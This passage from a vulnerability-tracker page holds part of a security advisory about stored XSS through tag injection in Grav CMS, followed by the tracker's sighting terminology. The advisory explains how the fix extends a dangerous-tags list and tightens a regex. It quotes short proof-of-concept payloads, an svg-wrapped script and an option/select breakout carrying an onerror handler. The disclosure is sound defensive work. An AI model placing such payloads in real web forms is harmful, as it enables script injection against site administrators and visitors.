handlers is tightened; see the companion GHSA-9695-8fr9-hw5q advisory for details.\n\n2. **Missing dangerous tags** \u2014 `svg`, `math`, `option`, and `select` have been added to default `security.xss_dangerous_tags` in [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml). `svg` and `math` allow inline scripting through their XML namespace and event-handler surface; `option`/`select` are the tags attackers use to break out of the admin\u0027s select-template context before dropping the payload.\n\nCombined with the tightened `on_events` regex, the PoC `\u003csvg\u003e\u2026\u003cscript\u003e\u2026\u003c/script\u003e\u003c/svg\u003e` (and the GHSA-c2q3 `\u003c/option\u003e\u003c/select\u003e\u003cimg src=x onerror=alert(1)\u003e` variant) now trip at least one detector.\n\n**Files:**\n- [`system/config/security.yaml`](https://github.com/getgrav/grav/blob/2.0/system/config/security.yaml) \u2014 dangerous-tags list extended.\n- [`system/src/Grav/Common/Security.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Common/Security.php) \u2014 regex tightening.\n- [`tests/unit/Grav/Common/Security/DetectXssTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/DetectXssTest.php).",
"id": "GHSA-w8cg-7jcj-4vv2",
"modified": "2026-05-13T13:52:40Z",
"published": "2026-05-05T21:36:27Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/security/advisories/GHSA-w8cg-7jcj-4vv2"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42611"
},
{
"type": "WEB",
"url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
},
{
"type": "PACKAGE",
"url": "https://github.com/getgrav/grav"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "Grav is Vulnerable to Stored XSS via Tag Injection"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…